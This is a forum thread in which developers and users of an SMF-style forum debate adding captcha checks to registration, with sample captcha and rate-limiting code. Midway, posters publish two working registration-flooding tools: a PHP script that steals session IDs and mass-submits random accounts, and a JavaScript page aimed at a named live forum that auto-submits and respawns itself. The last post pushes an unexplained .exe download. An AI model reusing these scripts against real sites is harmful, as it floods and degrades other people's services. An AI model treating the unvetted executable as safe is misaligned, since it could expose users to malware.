I was just wondering if this was too hard in general and will cause more problems?
I like the font but was wondering if I should change it?
You don't have to register if you want to test it; just enter the code and check "agree", and if it's right it will tell you to go back and enter a username!
http://www.xtram.net/smf/index.php?action=register
also would any one be interested in this?
There are some people who really seem to want to get this implemented in SMF, and it was even put into the cvs without warning once - but that code didn't even remotely work for me, and effectively disabled registration.
SMF has registration spamming protection, although not automatic registration prevention (the only thing captchas do for you over what SMF does). I think this is good enough for the core release, because it works for everyone, not just some people.
-[Unknown]
What would you suggest? I mean, I agree the image is hard to read, because the O's look like 0's, except the 0's stand upright without distortion, and many other letters are way too distorted. But what would be needed other than a more distinct font and another type of distortion a computer wouldn't break? I understand this is extremely hard to read now and I'm open to suggestions to get it more user friendly. I do like the spam protection in place now, and I used it in the UserBook mod.
When I say it didn't work for me, I mean that I got X's for images. This is partially because I do NOT have the gd library - and it should not be a requirement for SMF.
The captcha I see is... somewhat hard to read, yes. I would recommend using ONLY letters, and putting a note that ALL characters are in fact letters. Also I hope you ignore case ;).
-[Unknown]
I mean this as a mod, not as a possible inclusion in SMF, so someone looking to use this would have to have GD. I even had to look up a workaround to get GD to load the fonts, since I don't know what to do to get freetype and zlib on my PC, so even testing was difficult. Do you think all letters are better, or numbers? I guess letters, since there are more. And I do ignore case; I use strtoupper, so anything can be used.
It was me who did the dishonorable thing of adding it to CVS :P However, it was an option that could have been disabled for those without GD installed :D
Anyway - I'll package the code changes into a mod if anyone would find it useful - if you want to do it Aquilo here is the code I used to generate the images:
// Create Human Verification Image.
function VerificationImage()
{
// $context must be declared global as well, otherwise the assignment below only sets a local copy.
global $modSettings, $context;
$context['template_layers'] = array();
// Can't be called from elsewhere
if (!isset($_REQUEST['sa']) || empty($modSettings['requireRegistrationVerification']))
exit;
// The text to create (set in Register(); it stays server-side and only ever reaches the client as pixels).
$randomText = $_SESSION['reg_randomText'];
// The image that we will be using as the "verification image"
$verImg = imagecreate(200, 40);
// Background colour - dark blue - nice! (the first colour allocated on a palette image becomes its background)
imagecolorallocate($verImg, 11, 30, 91);
// Define white!
$white = imagecolorallocate($verImg, 255, 255, 255);
// Give it a pretty background.
imagerectangle($verImg, 2, 2, 197, 37, $white);
// Draw the text, one character at a time, each in a random font at a slightly random height.
for ($i = 0; $i < 8; $i++)
if (isset($randomText[$i]))
imagechar($verImg, rand(2, 10), 20 * $i + 20, 10 + rand(0, 4), $randomText[$i], $white);
// output image in the browser
header("Content-type: image/png");
imagepng($verImg);
// free memory
imagedestroy($verImg);
obExit(false);
}
Where $_SESSION['reg_randomText'] is set in the Register function to whatever you want the code to be (no more than 8 letters). There's a little more code than this, but this is most of it.
What I would really like to see is someone take the time to write a captcha class for PHP. Then it can be integrated into different PHP apps. It should also support audio captchas for those who are visually impaired.
http://www.phpclasses.org/browse/package/1163.html
How would you make a captcha for the visually impaired? Are there any visually impaired users here?
I have worked with that voice engine in html before, I was even going to mess around with making it part of YaBB SE but these things are specialized for the forum/site using them.
But how would you do that? A computer could easily interpret audio better than an OCR program with an image; honestly, the only distortion you need to mess an OCR up is a JPEG with minor artifacts around the text and it's messed up!
You distort the audio, add reverb, echo, etc.
PHP can edit (alter/merge) WAV or MP3 files??
How did such an essential feature as this get overlooked? Spammers can just romp onto a forum, set up a simple JavaScript on their computer, and fire off new registrations 100 at a time! Without image verification, they don't even need a valid session ID! I had set up a PHP script to demonstrate this, but that one actually requested a session ID for each one - at the same time, a friend of mine made one in JavaScript that just did it by itself, using the CURRENT session ID hundreds of times!
I like this "[captcha]" thing, that is pretty sleek. But doesn't that require space in the MySQL DB? I made a very simple, though not-as-secure setup that uses ROT13 on the random letters so the client never gets the actual code, except in image. There's a post on my forum (http://forum.falconsys.net/index.php?topic=220.0) with the tweaks to set up this simple mod.
(http://forum.falconsys.net/sources/genregimg.php?string=vzntr)
^ sample output
But seriously, why was such a plainly essential feature overlooked?
It should actually block this... without inconveniencing the user! What a thought! Why would you ever not want to inconvenience someone you want to register?
Go and try it. Register me a thousand accounts on an SMF forum. If you get through, I'll add more protections, but this (captchas, images, inconveniences) is not by far something that is needed.
Quote from: [Unknown] on March 27, 2004, 12:01:25 AM
There are some people who really seem to want to get this implemented in SMF, and it was even put into the cvs without warning once - but that code didn't even remotely work for me, and effectively disabled registration.
SMF has registration spamming protection, although not automatic registration prevention (the only thing captchas do for you over what SMF does). I think this is good enough for the core release, because it works for everyone, not just some people.
-[Unknown]
This was "overlooked" because it can cause problems on some configurations of PHP and shipping a forum that you can't even register on is pretty lame, wouldn't you say?
-[Unknown]
Been there, exploited that. I already said it was done, would I SAY it was done if it wasn't?
<?php
if (isset($_GET['numtimes']) && isset($_GET['url']) && isset($_GET['host'])) {
$max = $_GET['numtimes'];
$path = $_GET['url'];
$port = 80;
$i = 0;
$host = $_GET['host'];
function get_phpsessid(){
$path = $_GET['url']; // URL to f*ck :)
$port = 80; // duh
$host = $_GET['host']; // Host
$fp = fsockopen($host,$port); // Open connection
$request = 'GET / HTTP/1.1'.chr(0x0D).chr(0x0A).
'Host: '.$host.chr(0x0d).chr(0x0a).
'Accept: */*'.chr(0x0d).chr(0x0a).
'Connection: close'.chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a);
fputs($fp,$request);
// fputs($fp,'Connection: close\r\n\r\n');
while(!isset($needle)) {
$****** = fgets($fp,1024); // get 1k of ******
$one = explode(chr(0x0D).chr(0x0A),$******); // explode ****** into array of lines
foreach ($one as $input) {
if (strstr($input,'Set-Cookie:')) {
$needle = $input; // do we see the set-cookie? set that as needle.
fclose($fp); // not wasting bandwidth ;)
}
}
}
return(substr(strstr($needle,'='),1,32)); // give back what we found as the result of the function.
}
for($i;$i<=$max;$i++) { // is $i? yes? then is i <= max? yes? then make i one bigger.
$pass = chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)); // random password, lower a~z, 5 letters
$formdata = array ( "user" => chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'fsnet', "email" => chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'@'.chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'falcpwnedu.com', 'passwrd1' => $pass, 'passwrd2' => $pass, "regagree" => "yes" );
//build the post string
$poststring = ""; // else, error
foreach($formdata AS $key => $val){ // parse the array into... well, i guess i could've done without this and just jumped straight into &var=val...
$poststring .= urlencode($key) . "=" . urlencode($val) . "&";
}
$poststring = substr($poststring, 0, -1); // strip off trailing ampersand
$fp = fsockopen($host, $port); // open the connection
$phpsessid = get_phpsessid(); // run the new function to request the index page and steal the phpsessid
echo 'Using PHPSESSID '.$phpsessid.'<br>'; // verbosity = teh pwn
$request = 'POST '.$path.'&PHPSESSID='.$phpsessid.' HTTP/1.1'.chr(0x0D).chr(0x0A).
'Host: '.$host.chr(0x0D).chr(0x0A).
'Content-type: application/x-www-form-urlencoded'.chr(0x0D).chr(0x0A).
'Content-length: '.strlen($poststring).chr(0x0D).chr(0x0A).
'Connection: close'.chr(0x0D).chr(0x0A).chr(0x0D).chr(0x0A).
$poststring.chr(0x0D).chr(0x0A).chr(0x0D).chr(0x0A); // the request, PHP seems to send a bad newline so i have to use 0d/0a
echo 'Sending:<br>'.nl2br($request).'<br>'; // more verbosity
fputs($fp,$request); // send it
//loop through the response from the server
while(!isset($stop)) {
$food = fgets($fp,4096); // food for thought
echo $food; // screen clutter: "accepted", "awaiting email"... "banned"?
if (strstr($food,'Topics by')) $stop = 'YES FFS!'; // stop at the sound of the "member count increase".
}
echo '</table></table></table></body></html>'; // TRYIN to clean up the screen after a partial load...
unset($stop); // so it at least sends something next time
fclose($fp); // no guess, no mess.
sleep(5); // get past teh "YOU JSUT REGISTERED 5 SECOND AGAO!!!!11111oneone" error.
echo '<br><br>Count '.$i.' of '.$max.'...<br><br>'; // more verbosity.
}
} else {
$html = '<html><body>Hello SMF hole! :)<br><br>
<form method="GET" action="'.$_SERVER['PHP_SELF'].'">
Number of random new user regs to run: <input type="text" name="numtimes" size="10"><br>
HOST name (no http, no trailing slash): <input type="text" name="host" size="50"><br>
Remainder of URL (path, including "?action="): <input type="text" name="url" size="50"><br>
<input type="submit" value="******!"></body></html>';
echo $html;
}
// Tag below was put in JUST FOR BLACKBIRD, ya crazy b*stard. :P
?>
By the way, this is the "long version" that I wrote (me not knowing JavaScript, and only having about 1 month experience in PHP). I'll have to dig up the much shorter and less complicated JavaScript one. That one just submits random entries in the form (input type="hidden" name="username" id="user", then document.form.user.value=random) every 5 seconds. The newer version of it opens up about 10 frames of itself and creates 120 registrations a minute. More frames? More users.
Have to wait til tomorrow to get the code for that gem, though.
Heh. Maybe we should raise the spam timeout on register to 60 seconds; that would probably suffice in most cases.
Can't you, like, raise a little flag on the specific session ID that says "Hey, this newbie already registered"? My little PHP script may retrieve a new session ID each time (by grabbing /index.php without sending a cookie in), but it's SLOW! The JavaScript one (it's not tomorrow yet, sorry) relies on the browser, which just keeps telling it the same session ID over and over... of course, there are other ways to go about it.
Not to raise competition here (hmm...), but Invision has done the enter-the-number verification thing for a while now... without the GD library! I think they do it by storing the binary data for the graphics in the PHP source itself (not THAT hard to do, just URLEncode/decode it), but I may be wrong. Maybe you should look into how they do it...?
I did originally write the image verification that Unknown talks about and I actually have it coded (and 90% working) but there are probably better ways than using it and I can't see us ever adding it to the distro - although I may offer it as a MOD. At the end of the day, mass registration on a forum isn't that big a deal. If someone tries it, they can only do it once as you'll quickly delete all the accounts and ban their IP.
SMF checks the IP address of the user and logs it, and it is this that it uses to stop mass registration. It's just as useful going by the IP address as going by the session ID, as neither will change in your JavaScript method.
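A constructed illustration of the two kinds of registration limit discussed above, the per-IP check and a site-wide "n registrations in s seconds" tripwire. This is added example code in Python, not SMF's own, and the IPs, thresholds and window sizes are assumptions:

```python
"""Registration flood guard, a constructed example (not SMF code).

Two sliding-window checks: per source IP (minimum spacing plus a count per
window) and a site-wide "n registrations in s seconds" tripwire, which is
the one that still fires when the attempts arrive from many distinct IPs.
"""
from collections import defaultdict, deque


class RegistrationGuard:
    def __init__(self, per_ip_spacing=5, per_ip_limit=3, per_ip_window=3600,
                 global_limit=50, global_window=60):
        self.per_ip_spacing = per_ip_spacing   # seconds between regs from one IP
        self.per_ip_limit = per_ip_limit       # accepted regs per IP per window
        self.per_ip_window = per_ip_window
        self.global_limit = global_limit       # accepted regs site-wide per window
        self.global_window = global_window
        self._by_ip = defaultdict(deque)       # ip -> timestamps of accepted regs
        self._all = deque()                    # timestamps of all accepted regs

    @staticmethod
    def _prune(queue, now, window):
        """Drop timestamps that have fallen out of the window."""
        while queue and now - queue[0] > window:
            queue.popleft()

    def check(self, ip, now):
        """Return (allowed, reason) without recording anything."""
        ip_q = self._by_ip[ip]
        self._prune(ip_q, now, self.per_ip_window)
        self._prune(self._all, now, self.global_window)
        if ip_q and now - ip_q[-1] < self.per_ip_spacing:
            return False, "registered too recently from this IP"
        if len(ip_q) >= self.per_ip_limit:
            return False, "per-IP registration limit reached"
        if len(self._all) >= self.global_limit:
            return False, "site-wide registration flood"
        return True, "ok"

    def register(self, ip, now):
        """Apply the checks and record the registration if it is allowed."""
        allowed, reason = self.check(ip, now)
        if allowed:
            self._by_ip[ip].append(now)
            self._all.append(now)
        return allowed, reason


def simulate_single_ip_flood():
    """One script on one (made-up) IP submitting every 5 seconds, as in the thread."""
    guard = RegistrationGuard()
    return [guard.register("203.0.113.5", t)[0] for t in range(0, 60, 5)]


def simulate_distributed_flood(hosts=200):
    """Each of many distinct (made-up) IPs registers once within a minute."""
    guard = RegistrationGuard()
    accepted = 0
    for i in range(hosts):
        allowed, _ = guard.register(f"198.51.100.{i}", i * 0.1)
        accepted += allowed
    # The per-IP rules never fire here; only the global window caps the run.
    return accepted


if __name__ == "__main__":
    print(simulate_single_ip_flood())
    print(simulate_distributed_flood())
```

The per-IP rules stop the single-host script after three accounts, while the site-wide window is what limits the many-IP case; neither catches a slow drip spread over weeks, which is the gap a captcha is meant to cover.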
It's not really that big a deal, but it does get to be a concern on little kids' servers in their closets, when someone gets pissed at them, that they can fill their MySQL DB up with thousands of new users. I'd always thought it wasn't a big deal, and wondered why people did those verification things, until it happened to my server :P
Sure doesn't seem like it logs their IP at all, 'cuz even with me being logged in (!), I can STILL register. Just tried it on this forum, though, and it dumps me at the index page. I guess you fixed that here :)
Both of our scripts ran from the same IP (though the JS one was distributed among clients), and worked fine...
Here's the JS one (happy scrolling!):
<head>
<script language="javascript">
function userValues() {
var firstLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter1 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
firstLetter= letter1[finalNumber]
var secondLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter2 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
secondLetter=firstLetter + letter2[finalNumber]
var thirdLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter3 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
thirdLetter=secondLetter + letter3[finalNumber]
var fourthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter4 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
fourthLetter=thirdLetter + letter4[finalNumber]
var fifthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter5 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
fifthLetter=fourthLetter + letter5[finalNumber]
var sixthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter6 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
sixthLetter=fifthLetter + letter6[finalNumber]
document.reg.regagree.value="yes"
document.reg.user.value=sixthLetter
document.reg.passwrd1.value=sixthLetter
document.reg.passwrd2.value=sixthLetter
document.reg.email.value=sixthLetter + "@" + sixthLetter + ".net"
document.reg.submit()
window.open("http://members.lycos.co.uk/moobbmoo/reg.html")
}
function timeIt() {
setTimeout("userValues()",5000);
}
timeIt()
</script>
</head>
<body>
<form action="http://forum.caservers.net/index.php?action=register2" method="post" name="reg">
<input type="hidden" name="regagree"><br>
<input type="hidden" name="user"><br>
<input type="hidden" name="passwrd1"><br>
<input type="hidden" name="passwrd2"><br>
<input type="hidden" name="email"><br>
</form>
</body>
Quote from: Falcon4™ on August 11, 2004, 09:00:21 AM
Not to raise competition here (hmm...), but Invision has done the enter-the-number verification thing for a while now... without the GD library! I think they do it by storing the binary data for the graphics in the PHP source itself (not THAT hard to do, just URLEncode/decode it), but I may be wrong. Maybe you should look into how they do it...?
And frankly, I don't care. Again, I am not at all even partially interested in that way of doing it.
Quote from: Falcon4™ on August 11, 2004, 05:46:37 PM
It's not really that big a deal, but it does get to be a concern on little kids' servers in their closets, when someone gets pissed at them, that they can fill their MySQL DB up with thousands of new users. I'd always thought it wasn't a big deal, and wondered why people did those verification things, until it happened to my server :P
Sure doesn't seem like it logs their IP at all, 'cuz even with me being logged in (!), I can STILL register. Just tried it on this forum, though, and it dumps me at the index page. I guess you fixed that here :)
I can only assume from that that you are using an older version of SMF. Older versions may not include the same security protections as newer ones..... obviously.
-[Unknown]
Must be hot development if a version that's maybe 3 weeks old is "outdated"... >:(
Quote from: Falcon4™ on August 11, 2004, 11:43:26 PM
Must be hot development if a version that's maybe 3 weeks old is "outdated"... >:(
Umm.... yes, that is rather outdated. You are not a charter member. Consider the date on which that release was made.... April 26th!
That's months ago. Even if development were slow as molasses something had to have been done to the code since then...
-[Unknown]
Even though captchas do not block everyone, they block many casual script kiddies. As soon as we up the amount of time involved in flooding a board, it decreases the number of people willing to try.
I fully support captchas being added to SMF, after seeing their use on a site that does well over 1000 requests per second.
Quote from: David on August 12, 2004, 04:11:39 AM
Even though captchas do not block everyone, they block many casual script kiddies. As soon as we up the amount of time involved in flooding a board, it decreases the number of people willing to try.
I fully support captchas being added to SMF, after seeing their use on a site that does well over 1000 requests per second.
I just added more protection to registration, as requested. Didn't take captchas.
And, again, there can be server configuration problems that will make them not work. So good bye to ANY registrations.
-[Unknown]
Just a couple points:
1. Registration spamming is not and will never be a question of one person from one ip, but of thousands of collectively-linked drones from thousands of unique IPs. If you are not familiar with the concept of dDOS (Distributed Denial of Service), then you've been missing out on news of some of the largest attacks against some of the biggest sites with the biggest pipes on the internet. The danger of mass registrations is not from one person, but from at least 1000+ pseudo-persons. It becomes increasingly difficult to weed out or otherwise tell the difference between 1000 different ips with different length and pattern usernames and different emails from different domains from different countries... from just a normal user.
One might argue, however, that if 1000 people are attacking your site you're screwed anyway; however, it's easy to filter out fake traffic versus real traffic router-side during an attack (or simply disable areas of a site). It's quite another to have to go back into a database that's already filled with thousands of fake members, and thousands of spam topics upon those--taking up gigabytes of disk space-- and effectively filter it back out. Invariably, one must find a backup database copy (if there even is a recent one), and restore old, outdated information over what would have been new, up-to-date information, or just remove all new registrations after a certain timestamp.
2. Implementing OCR / Captcha technology in SMF would never interfere with its functionality if done correctly. By default, simply disable it for new installations. If users or their hosting companies have correctly-compiled versions of php with GD[2] installed, then a function can be added to enable the option, if they so desire (just like a user can choose whether or not to dynamically resize off-site avatars).
3. OCR isn't just to make things look pretty; moreover, in almost any case, simple logic to prevent registration spamming is insufficient-- particularly code that scales. It's possible to add global regflood protection based on the site size (for example, a small site isn't going to have 1000 registrations within 1 minute, most likely), however, even after the 'n' number within the 's' seconds ratio has been tripped, there are most likely already 'n' registrations and who knows how many spam topics. Additionally, what if the attacker is patient, and decides not to attack your site all at once, but slowly register thousands upon thousands of drones over the course of one month; then, all at once, reconnects them all to post topic upon topic.
Yahoo uses it. Hotmail/MSN uses it. Egold uses it. If OCR technology was just to make things look pretty, I highly doubt that so many high-end companies plagued with automated registrations would waste the valuable memory and CPU to perform bulk-scale image de- and re-compression operations on-the-fly; at least, not when those same resources could be diverted to something more ambitious.
I am most likely just going to code this in on my own if it lacks the support from others, but I see it as an invaluable feature for anyone who might ever potentially have some ex-packet kiddie sic his new-found toy drones on your site for banning him.
"Respectfully, I dissent." :P
Quote from: koder on March 07, 2005, 10:39:42 PM
Just a couple points:
1. Registration spamming is not and will never be a question of one person from one ip, but of thousands of collectively-linked drones from thousands of unique IPs. If you are not familiar with the concept of dDOS (Distributed Denial of Service), then you've been missing out on news of some of the largest attacks against some of the biggest sites with the biggest pipes on the internet. The danger of mass registrations is not from one person, but from at least 1000+ pseudo-persons. It becomes increasingly difficult to weed out or otherwise tell the difference between 1000 different ips with different length and pattern usernames and different emails from different domains from different countries... from just a normal user.
And this will take down the server, not register a billion accounts. The effects of DDoS attacks are much more pervasive than a few thousand registrations, which are relatively easy for anyone running that high profile a site to clean up.
Quote
One might argue, however, that if 1000 people are attacking your site you're screwed anyway; however, it's easy to filter out fake traffic versus real traffic router-side during an attack (or simply disable areas of a site). It's quite another to have to go back into a database that's already filled with thousands of fake members, and thousands of spam topics upon those--taking up gigabytes of disk space-- and effectively filter it back out. Invariably, one must find a backup database copy (if there even is a recent one), and restore old, outdated information over what would have been new, up-to-date information, or just remove all new registrations after a certain timestamp.
Why?
DELETE FROM smf_members
WHERE dateRegistered = 'when it happened'
AND lastLogin = 0;
You might lose a person or two, but that'll certainly be the least of your other (much harder to solve) problems.
Quote
2. Implementing OCR / Captcha technology in SMF would never interfere with its functionality if done correctly. By default, simply disable it for new installations. If users or their hosting companies have correctly-compiled versions of php with GD[2] installed, then a function can be added to enable the option, if they so desire (just like a user can choose whether or not to dynamically resize off-site avatars).
Wrong. People WILL turn it on, and people WILL not check to see if it works. I don't like building red buttons that say "don't push me" on them into the software. If it breaks for most people, it's a mod plain and simple.
Quote
3. OCR isn't just to make things look pretty; moreover, in almost any case, simple logic to prevent registration spamming is insufficient-- particularly code that scales. It's possible to add global regflood protection based on the site size (for example, a small site isn't going to have 1000 registrations within 1 minute, most likely), however, even after the 'n' number within the 's' seconds ratio has been tripped, there are most likely already 'n' registrations and who knows how many spam topics. Additionally, what if the attacker is patient, and decides not to attack your site all at once, but slowly register thousands upon thousands of drones over the course of one month; then, all at once, reconnects them all to post topic upon topic.
I suggest you see a psychologist. You are paranoid. Find me someone who has the resources *and* the immaturity to register 1000 accounts, activate the emails for all of them (and they can't be all the same domains/automatic, or that could be banned in your over-time scenario) and activate them all at once. If you have enemies that can automate that so easily, captchas won't do you a spot of good. I bet you sleep with a gun under your pillow too, huh?
Read: captchas are just like passwords. To brute forcing, they're another layer but that's all they are. People act as if they are a wall made of the finest steel or something... which is diluted, at best. Anyone who can do the things you speak of, over time, as you suggest... well, I'd be more worried about the administrator's passwords, captchas or no captchas.
Seriously, if you run a site that needs this, you can install a mod. You had to buy your gun, didn't you? You weren't born with it... apparently your DNA doesn't think it's a necessary feature everyone needs.
-[Unknown]
Hmm, don't see a psychologist (I'm working for my masters in it, though), but how did you know about the gun? It's really for the samurai henchmen that come during the night to tell me things. ;) ;)
Speaking of GD, GD1 is actually available on many if not most commercial webhosts' installations of php. It-- if not gd2-- is also bundled with all of the major control panels (plesk, ensim, cpanel). Every webhost I've ever seen compiles-in GD or Imagemagick (for fear of having to recompile due to excessive requests to enable it). Granted, it along with MySQL support are not by-default compiled into PHP, but just like MySQL many hosts use it. And either way, we've gone over this-- you already have features in the admin control panel that use GD (if a person supports it): Settings -> Avatar -> If the avatar is too large... -> Download and resize it (requires GD module). That's a big red button imo *shrug*
Granted the first half could be considered paranoid, however, when you're mentioning captchas in reference to brute forcing, remember: each captcha token/sequence can only be tried once, and then it is replaced with a new token on each subsequent attempt-- successful or not. The reason Yahoo! uses it with locked accounts (accounts that have exceeded n of bad passwd attempts in x time) is because brute force attacks can no longer work at the time the OCR kicks in. Even a bad password attempt kills the captcha sequence for that given try and generates another for the next login attempt, thus effectively removing the ability to effectively brute-force a password without a person there entering each attempt's captcha code OR software that does really good guesses on a 1:10,000 probability, 5 digit, random, base-10 number that rotates with every page access-- the only records of which remain hidden in server-side $_SESSION variables and in a human-only readable image.
It's something to think about *shrug*. I mean, the chances of success anyway in a brute-force attack are slim, but this would be a pretty effective deterrent from someone thinking "well, I might as well try." And trust me, there are _plenty_ of immature people who have the resources to pull this off. Even I used to be a "l33t hax0r" back in the day. :P Just think about all the other 14 year old packet kiddies who have nothing better to do than play Quake 3 and eat Funions after infecting their computer labs at school with home-brewed, drone-creating vb code. ;)
Anyway, I don't mean to keep beating a dead horse if you're really committed to shaking your head vehemently and not doing this, but it seems to me several other forum scripts eventually ended up integrating this in some form after repeated requests from their users (particularly invisionboard).
Thanks for the consideration, though :)
... and don't tell anyone about the gun. ;D
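The server-side half of the verification image posted earlier in the thread, together with the single-use token point koder makes above, as a constructed Python example (added here, not SMF's code or anything posted in the thread): the code lives only in a server-side store, is matched case-insensitively over letters that are hard to confuse, and is discarded after one attempt whether it succeeds or fails. The class name, alphabet, code length and TTL are assumptions:

```python
"""One-time CAPTCHA challenge store, a constructed example (not SMF code).

The image drawing is out of scope; this is the verification side: the code
never leaves the server except as pixels, comparison ignores case, and the
challenge is consumed on every attempt so a code cannot be guessed at twice
or replayed after a success.
"""
import hmac
import secrets
import string

# Letters only, as suggested in the thread, minus the ones that read as digits
# or as each other in a distorted font (assumption: O, I and L dropped).
ALPHABET = "".join(c for c in string.ascii_uppercase if c not in "OIL")
CODE_LENGTH = 6
TTL_SECONDS = 300


class CaptchaStore:
    def __init__(self):
        # session_id -> (code, expires_at); the stand-in for $_SESSION['reg_randomText'].
        self._pending = {}

    def issue(self, session_id, now):
        """Create a fresh challenge for this session; the return value feeds the image renderer only."""
        code = "".join(secrets.choice(ALPHABET) for _ in range(CODE_LENGTH))
        self._pending[session_id] = (code, now + TTL_SECONDS)
        return code

    def verify(self, session_id, answer, now):
        """Return True only for a fresh, unexpired, matching answer.

        The pending challenge is removed before it is checked, so a wrong
        guess cannot be retried against the same code and a correct answer
        cannot be submitted a second time.
        """
        entry = self._pending.pop(session_id, None)
        if entry is None:
            return False
        code, expires_at = entry
        if now > expires_at:
            return False
        # Case-insensitive (strtoupper, as in the thread) and constant-time.
        normalised = (answer or "").strip().upper().encode()
        return hmac.compare_digest(normalised, code.encode())


def guess_probability():
    """Chance of a single blind guess succeeding against one challenge."""
    return 1.0 / (len(ALPHABET) ** CODE_LENGTH)


if __name__ == "__main__":
    store = CaptchaStore()
    code = store.issue("demo-session", now=0)
    print("issued", code, "first attempt:", store.verify("demo-session", code.lower(), 1))
    print("replay:", store.verify("demo-session", code, 2))
    print("blind guess odds:", guess_probability())
```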
Quote from: koder on March 12, 2005, 03:20:07 PM
Hmm, don't see a psychologist (I'm working for my masters in it, though), but how did you know about the gun? It's really for the samurai henchmen that come during the night to tell me things. ;) ;)
Heh, heh... see, I thought you'd know I was joking. Funny enough, someone actually complained to me about saying that!
Quote
Speaking of GD, GD1 is actually available on many if not most commercial webhosts' installations of php. It-- if not gd2-- is also bundled with all of the major control panels (plesk, ensim, cpanel). Every webhost I've ever seen compiles-in GD or Imagemagick (for fear of having to recompile due to excessive requests to enable it).
I've seen a lot of web hosts, and as importantly, test servers set up by novices. It's mad mojo to lose the prospective user on the testing, even if that's the only place the problems will occur. We've had problems with people who compiled OUT session support (enabled by default!)
Quote
And either way, we've gone over this-- you already have features in the admin control panel that use GD (if a person supports it): Settings -> Avatar -> If the avatar is too large... -> Download and resize it (requires GD module). That's a big red button imo *shrug*
Avatars are a lot less essential than registrations. If avatars aren't working, they'll ask here. If registrations aren't working, they'll install another software.
Quote
each captcha token/sequence can only be tried once, and then it is replaced with a new token on each subsequent attempt-- successful or not.
So now you're saying my passwords are even LESS secure than captchas? You're going to have me sleeping with a gun under my log in box!
Quote
Even a bad password attempt kills the captcha sequence for that given try and generates another for the next login attempt, thus effectively removing the ability to effectively brute-force a password without a person there entering each attempt's captcha code OR software that does really good guesses on a 1:10,000 probability, 5 digit, random, base-10 number that rotates with every page access-- the only records of which remain hidden in server-side $_SESSION variables and in a human-only readable image.
Using captchas for logins is a complete joke. Anyone serious enough to really work at it will realize that you can try authentication using the Cookie header, which OBVIOUSLY cannot require a captcha. And the only solution to that is disallowing "log in forever" which would lose a large percentage of our userbase too.
Quote
It's something to think about *shrug*.
I've thought about it, and as much as I do disagree with it, I'm not discounting it. More importantly, the quality of hosts is - in my opinion - increasing, and I have plans/hopes for it to continue doing so.... don't think there's no future for this idea, but I still don't think it's practical at this point.
Quote
I mean, the chances of success anyway in a brute-force attack are slim
Indeed, there are other protections on registration which would definitely slow people down (transparent ones.)
Quote
Just think about all the other 14 year old packet kiddies who have nothing better to do than play Quake 3 and eat Funions after infecting their computer labs at school with home-brewed, drone-creating vb code. ;)
They don't have 1000 computers to do a distributed attack on you.... because they'd need 1000 IP addresses. That's just crazy.
Quote
... and don't tell anyone about the gun. ;D
Well, (assuming you live in America) it's your constitutional right, isn't it?
-[Unknown]
Security code necessary.
Download and try this.
http://www.tahribat.com/denyolaunch/denyolaunch.asp
http://www.tahribat.com/download/denyolaunch.exe (English)